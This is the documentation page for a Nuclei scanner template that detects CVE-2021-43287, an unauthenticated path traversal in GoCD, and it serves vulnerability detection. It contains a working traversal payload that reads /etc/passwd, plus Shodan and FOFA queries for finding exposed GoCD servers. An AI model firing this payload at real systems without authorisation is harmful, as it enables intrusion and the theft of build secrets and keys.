Pre-Auth Takeover of Build Pipelines in GoCD
ID: CVE-2021-43287
Severity: high
Author: dhiyaneshDk
Tags: cve2021,cve,go,lfi,gocd,thoughtworks
Description
Section titled “Description”GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
YAML Source
Section titled “YAML Source”id: CVE-2021-43287
info: name: Pre-Auth Takeover of Build Pipelines in GoCD author: dhiyaneshDk severity: high description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys. impact: | Successful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications. remediation: Upgrade to version v21.3.0. or later. reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - https://www.gocd.org/releases/#21-3-0 - https://github.com/gocd/gocd/commit/41abc210ac4e8cfa184483c9ff1c0cc04fb3511c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43287 cwe-id: CWE-200 epss-score: 0.59294 epss-percentile: 0.97471 cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thoughtworks product: gocd shodan-query: - http.title:"Create a pipeline - Go" html:"GoCD Version" - http.html:"gocd version" - http.title:"create a pipeline - go" html:"gocd version" fofa-query: - title="create a pipeline - go" html:"gocd version" - body="gocd version" google-query: intitle:"create a pipeline - go" html:"gocd version" tags: cve2021,cve,go,lfi,gocd,thoughtworks
http: - method: GET path: - "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502203342e7213322729d52eb5e40f2bc0bc0dac7c0ea9cd07d6d456295ffd93f0e0e0221008b0e48ffd7f6e47eb0ac4252914a18dcccb4a28f4a5553a6bf2e828d20e717b4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43287.yaml"